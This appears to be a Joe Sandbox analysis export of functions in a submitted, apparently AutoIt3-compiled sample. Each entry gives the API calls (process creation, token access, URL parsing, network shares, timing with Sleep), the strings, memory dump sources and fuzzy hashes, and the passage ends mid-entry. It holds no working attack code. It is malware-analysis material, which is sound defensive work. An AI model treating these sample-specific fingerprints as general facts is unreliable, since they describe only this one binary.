Function 00981290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
GetClientRect.USER32(?,?), ref: 009BB5FB
GetCursorPos.USER32(?), ref: 009BB605
ScreenToClient.USER32(?,?), ref: 009BB610

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 62dd6c005ff9e64cb3826d7424726e88497688147a4c8c4d5b54a2b7a2789b10
Instruction ID: 8dcbd4addf86fbdd61396bc3bc1d585ebd437777f987b7160041c3cea6d5cd59
Opcode Fuzzy Hash: 62dd6c005ff9e64cb3826d7424726e88497688147a4c8c4d5b54a2b7a2789b10
Instruction Fuzzy Hash: 92112835A0011DAFCB10EFA8D8859EE77BCEB45311F400456F911E7241D730BA528BA5

Function 009E1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E118E
Sleep.KERNEL32(?,?,?,?,?,?,?,009DFCED,?,009E0D40,?,00008000), ref: 009E11C1

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 35d9fa5b8424743516c1fe016eea3a415338537827c8f71bdace7f74a8be3c16
Instruction ID: 6e9cb8b7124ab5cd910b3f246077d3233e788bd4b744da73885b0af5572445a3
Opcode Fuzzy Hash: 35d9fa5b8424743516c1fe016eea3a415338537827c8f71bdace7f74a8be3c16
Instruction Fuzzy Hash: 2B114831C0465DEBCF05DFE6D888AEEBB78FB09711F004555EA45B2240CB7099518BD1

Function 009DD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009DD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009DD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009DD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009DD897

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: adc1f20931c121e541466aa35885f8cbd196d222fc0fa0bb879f987756aa520d
Instruction ID: 7fd32b1755433696e023a5296654f34b1d4cdcbdb37fa42a4c1e1212d2776197
Opcode Fuzzy Hash: adc1f20931c121e541466aa35885f8cbd196d222fc0fa0bb879f987756aa520d
Instruction Fuzzy Hash: 6C116575646308DFE331CF94DC48F93BBBCEB00700F10896AA915D6550D7B5E546EBA1

Function 009B6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 009B6FDB

Part of subcall function 009B76C2: __fltout2.LIBCMT ref: 009B76EB

__cftog_l.LIBCMT ref: 009B7001
__cftoe_l.LIBCMT ref: 009B7033

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 1a11424568091cfec1c0c9b6414b1e0fd5e40868293d1d6befb264a9a9386512
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 02017E3204814EBBCF126EC4CD01CED7F66BB98360F498616FA1868030C236C9B1AB91

Function 00A0B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A0B2E4
ScreenToClient.USER32(?,?), ref: 00A0B2FC
ScreenToClient.USER32(?,?), ref: 00A0B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0B33B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
Instruction ID: 62fa0eee2c9c334792b84a67f4ac87e4048ed4c798fe247a38bb332b3ef1faae
Opcode Fuzzy Hash: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
Instruction Fuzzy Hash: 8D1163B9D0024DEFDB11CFA9D8849EEBBB9FB08310F108166E914E3620D735AA518F51

Function 00A0B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A0B644
_memset.LIBCMT ref: 00A0B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A46F20,00A46F64), ref: 00A0B682
CloseHandle.KERNEL32 ref: 00A0B694

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 360af1d800f87d822886b67d25a329e1eec5234918932587bffd1b353807907d
Instruction ID: efe730257e494b2adfe2a56f58836e14b600d5935a5422216837e2d914a41d95
Opcode Fuzzy Hash: 360af1d800f87d822886b67d25a329e1eec5234918932587bffd1b353807907d
Instruction Fuzzy Hash: 1CF054B95403047FE21067A57C05F7B3A5CEB47755F004020BA48E9592D7774C0687AA

Function 009E6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009E6BE6

Part of subcall function 009E76C4: _memset.LIBCMT ref: 009E76F9

_memmove.LIBCMT ref: 009E6C09
_memset.LIBCMT ref: 009E6C16
LeaveCriticalSection.KERNEL32(?), ref: 009E6C26

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: ea2a1482d5ab716ca7f73980f98199b968361b57ac0a8bec7f062ac0c93c7a38
Instruction ID: c5d5c15d2ca902f306ea9837692a2f3923ea8f7836cec8ac97108e83b6596728
Opcode Fuzzy Hash: ea2a1482d5ab716ca7f73980f98199b968361b57ac0a8bec7f062ac0c93c7a38
Instruction Fuzzy Hash: 84F05B3A1001046BCF016F95DC85B86BB25EF85324F048061FD085E157C732D812DBB5

Function 00982218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00982231
SetTextColor.GDI32(?,000000FF), ref: 0098223B
SetBkMode.GDI32(?,00000001), ref: 00982250
GetStockObject.GDI32(00000005), ref: 00982258
GetWindowDC.USER32(?,00000000), ref: 009BBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 009BBE90
GetPixel.GDI32(00000000,?,00000000), ref: 009BBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 009BBEC2
GetPixel.GDI32(00000000,?,?), ref: 009BBEE2
ReleaseDC.USER32(?,00000000), ref: 009BBEED

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d5a974c30eaec418828999e35400bce1c3731f84b63b84ca9c24af5c72f72cf2
Instruction ID: 83f0fbb281a0301fdc0d9e4940a60351ce009cc5eab552f641ccba5a506df18b
Opcode Fuzzy Hash: d5a974c30eaec418828999e35400bce1c3731f84b63b84ca9c24af5c72f72cf2
Instruction Fuzzy Hash: 78E03932104248AEDF219FA4EC0D7D83B14EB05332F008366FB69680E187B14992DB12

Function 009D8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 009D871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,009D82E6), ref: 009D8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009D82E6), ref: 009D872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,009D82E6), ref: 009D8736

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
Instruction ID: 30e48e760e8bd4d2205f5a34404feebe970e6fd23ba4e76d3f323ee0de869a8f
Opcode Fuzzy Hash: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
Instruction Fuzzy Hash: E8E086366512159FD7309FF45D0CB9B3BACEF54791F148828B645EA041EA348443C750

Function 009DB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 009DB4BE

Strings

AutoIt3GUI, xrefs: 009DB436
Container, xrefs: 009DB43B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 5fc9b207cd9e163a020cf8252eb6233e3e566a9ac95dc74134779b39cd15245b
Instruction ID: c613417d08890c5533d0cf8db5ccbbc83279177aab5ad6d9cd4721b09b579b9e
Opcode Fuzzy Hash: 5fc9b207cd9e163a020cf8252eb6233e3e566a9ac95dc74134779b39cd15245b
Instruction Fuzzy Hash: 8A912770640601EFDB14DF64C884B6AB7E9FF49710F21856EF94A8B3A1DB70E841CB50

Function 009EAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

__wcsnicmp.LIBCMT ref: 009EB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009EB0F6

Strings

LPT, xrefs: 009EB027

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 070ea0ac9ef48850c94c91abedae5bbe84f8993751755492e1856def6a18751c
Instruction ID: af74e475dfbf55f99642a8117902be157e998f780e4e277f79a5c7ce51953320
Opcode Fuzzy Hash: 070ea0ac9ef48850c94c91abedae5bbe84f8993751755492e1856def6a18751c
Instruction Fuzzy Hash: 8F619071A04219AFCB15EF99C891EBFB7B8EF48310F144069F916AB391D730AE44CB90

Function 00992957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00992968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00992981

Strings

@, xrefs: 00992975

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 392f118c16f1a64b2e050858113462e3349091de8d15ad63c203b37d3c098f2d
Instruction ID: 4ab09f4b907352f049df01940d84c8604c31712ef8db69e13532d7d81a9c91e1
Opcode Fuzzy Hash: 392f118c16f1a64b2e050858113462e3349091de8d15ad63c203b37d3c098f2d
Instruction Fuzzy Hash: A55147714087449BD320EF54D886BAFBBE8FBC5344F81885DF2D9411A1DB30856ACB66

Function 009E9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00984F0B: __fread_nolock.LIBCMT ref: 00984F29

_wcscmp.LIBCMT ref: 009E9824
_wcscmp.LIBCMT ref: 009E9837

Strings

FILE, xrefs: 009E9770

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 119c821da52bec2286c5c76ba64a3c157f5960661ae5cc885fd5b3ad82321f34
Instruction ID: cc5ce72e8f0bce7ade5b5b3a0120fc05a2410b8675aeaed6543ed79486aa6e24
Opcode Fuzzy Hash: 119c821da52bec2286c5c76ba64a3c157f5960661ae5cc885fd5b3ad82321f34
Instruction Fuzzy Hash: 9341D971A0424ABADF21ABA5CC45FEFB7BDDF86710F004469FA04E7181D7719D048BA1

Function 009F258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009F259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009F25D4

Strings

|, xrefs: 009F25A5

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 0393e5ad73a795f9aadcb45a656d215abefa702ea9a1ea033fb10ffd4653f0d9
Instruction ID: 0f13c550f9483db0f41286bc60cb619971cfdcf09c47051050ce68354d82906f
Opcode Fuzzy Hash: 0393e5ad73a795f9aadcb45a656d215abefa702ea9a1ea033fb10ffd4653f0d9
Instruction Fuzzy Hash: D4311B71804119EBCF11EFA4CC85EEEBFB8FF48310F10006AF915A6262EB359956DB60

Function 00A07A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00A07B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A07B76

Strings

', xrefs: 00A07ACA

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 04e964c63d75ecb68e55210ace6f30a0de0e505762cdd3dfb7bf862bdd03cfc4
Instruction ID: a38146571ff81c0340e434a196ac27d743e6c7e2b6f66b19b29da69335563c84
Opcode Fuzzy Hash: 04e964c63d75ecb68e55210ace6f30a0de0e505762cdd3dfb7bf862bdd03cfc4
Instruction Fuzzy Hash: 8541E674E0520E9FDB14CF68D981BEEBBB5FB09340F10416AE905AB391D771A952CFA0

Function 00A06A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A06B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A06B53

Strings

static, xrefs: 00A06AB3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: f5f343b799dab46ef52e165e3c2abe6ee15f2cd2de9022dd152d785c275943e0
Instruction ID: 14fa6e87b5a767d09ed448dd413e44bcebfc0a3fa67906213b6a0ba3485dd3b1
Opcode Fuzzy Hash: f5f343b799dab46ef52e165e3c2abe6ee15f2cd2de9022dd152d785c275943e0
Instruction Fuzzy Hash: CF317E71210608AEDB10DF64DC81BFB77B9FF89764F108619F9A5D7190DA31AC92C760

Function 009E28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009E294C

Strings

0, xrefs: 009E290A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 294270a3d297df4701f4038d723cae5db9ff00754df156cb79bb855f7d5c2110
Instruction ID: 2c2f809a087a3ab33b52ff269650cfdb66094e5ce6966f812b3396ce555e1758
Opcode Fuzzy Hash: 294270a3d297df4701f4038d723cae5db9ff00754df156cb79bb855f7d5c2110
Instruction Fuzzy Hash: 99312B755003459FDF26CF5ACE45BAEBBFCEF45350F141029E885A61A2DB709D40CB51

Function 009F39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 009F3A66

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 009F3A58
, $, xrefs: 009F3AA6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 1f8c0ffb5a542d0323259e5eb7d38f6848f00332f678a26e4358d9017cedcdce
Instruction ID: d4b45604550065f2fb07e3cc048c0b8370563c7586eb4a21600417a93b84f09f
Opcode Fuzzy Hash: 1f8c0ffb5a542d0323259e5eb7d38f6848f00332f678a26e4358d9017cedcdce
Instruction Fuzzy Hash: AC214171600219AFCF10EFA5CC81FAEBBB5BF85700F504455F545A7282DB38EA45CB61

Function 00A066D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

